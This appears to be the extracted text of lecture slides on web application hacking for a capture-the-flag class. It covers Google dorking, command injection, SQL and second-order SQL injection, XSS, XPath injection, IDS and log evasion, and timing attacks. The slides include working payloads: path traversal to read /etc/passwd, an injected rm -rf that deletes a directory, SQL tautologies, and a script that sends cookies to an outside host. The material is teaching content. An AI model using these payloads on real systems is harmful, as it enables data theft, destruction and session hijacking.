Mike Gerschefske

Hacking is illegal (most of the time) Understand the laws Port Scanning can be considered

illegal Post 9/11 can be act of terrorism

DMCA Exceptions Educational Learning (Institution)

Who cares about web hacking? The days of buffer overflows and root

boxes are nearing an end… Non executing stacks People patching their systems

Everything is turning into a web system

Power of Google

Google knows all SSN/Credit Card, backend sql http://johnny.ihackstuff.com/ghdb.php

intitle:snc-rz30 inurl:home/ Robots.txt

Don’t put secrets in here

Power of the web browser

Is capable of HTTP GET/POST Capable of sending any kind of GET/POST Doesn’t have to run client side code (ie

javascript) Can send anything it wants to

Can be Bad: url: http://somesite/index.php?

section=Admin Vertical Escalation

Bad Code = Bad Security

You are not able to control client end: Cookies

Do not put User Level (admin, user, etc.) Vertical Escalation

Do not put user id Horizontal Escalation

Posts Gets Session IDs All Data

Museum Example

Code from two years ago: 1 #!/usr/bin/perl …

7 $first = param('first'); 8 $last = param('last'); 9 $password = param('password'); 10 … 25 if (($first eq "") || ($last eq "") || (! $password eq

"unbreakable")) { 26 print "<p>Could not understand or wrong password!!

</p>"; 27 } 28 else { 29 system "cat ./museum_ideas/${first}.${last}"; …

Some Good Combinations

Dump the password file:First Name: .

Last Name : /../../../../etc/passwd

Password  : unbreakable

Delete the whole directory:First Name: NOTEMPTY Last Name : & rm -rf

/home/museum/public_html/cgi_bin/museum_ideas

Password  : unbreakable

Command Injection

This is basic idea of command injection

Security through obscurity sometimes works

Some people are very diligent

SQL Injections

We can send commands, why not sql?

What is SQL?

What can we do with SQL? Get any data we want (that the user has

access to) Delete all the data the user has access to

If user is root, dump database If user is root, can upload and execute java/c from

database and root box

How to protect against it? Check parameters

Not really…

Need to do SQL parameterization when at all possible Mark strings as strings, ints as ints

SELECT * WHERE name = @

Why doesn’t checking params work? If you’re really smart it will, but if you

don’t understand the problem it wont This is a very difficult problem to understand

Example: http://viva/ictf/index.php/SQL_Injection

The problem is the ‘ (apostrophe) is a special character To fix we just find and replace all

apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string NO!

Second Level SQL Injection The problem actually isn’t solved, just

more complicated

Take:

Username = ' OR 'a' = 'a‘

SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

Goes in fine but coming out… Get username from DB and put in

var Var contains SQL We TRUST DB to give us good data Create another SQL Query and the

second one is now vulnerable

SELECT content FROM database WHERE username = VUNSQL

XSS – Cross Site Scripting Malicious injection of JavaScript Cookie Hi-jacking MySpace – Replicate itself, add friends

Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html

<script> document.write(“<img

src=http://site.com/a.jpg?cookie= “ + document.cookie)

</script>

Xpath Injection

//user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’]

Used with: XML RPC SOAP/WSDL

IDS Will Find You

SQL/Command Injection is very easy to detect

IDS poor at packet fragmentation with timing attacks

Profiling

Need to know what you’re attacking Can search for exploits

HEAD / HTTP/1.0 Example Everyone’s a little different

Nmap is a good profiler Nessus will profile too

Tools

Add N Edit Cookie – Mozilla Firefox extension

Wget TamperData – FireFox Modify Headers - FireFox Curl Netcat/Telnet

Proxies Paros Proxy – Free Fiddler – Microsoft, Free Spike – Free

Timing Attacks

Breaking Authentication Username and password wrong may

take x time while username doesn’t exist takes y time

Successful timing attacks against encryption

ASP.NET Exploit

Debugging (source code) only available to localhost

Bypass this check by sending the following: GET http://localhost/bleh.asp?a=j HTTP/1.0

Check’s server name variable rather then remote address

Mod_security

http://www.modsecurity.org/

Replay Attacks

Socrebot deletes flag Scorebot adds flag

Since the scorebot goes to everyone we have the delete and add sequence

Can potentially replay same delete sequence across all enemy servers

Log Evasion

Many logs only log ~4K of URL Prevents DOS from filling up logs

If payload at the end of 4k, wont log malicious payload

http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD Application ignores foo parameter Log shows up as GET /page.asp …

Not just IIS, Sun One App Server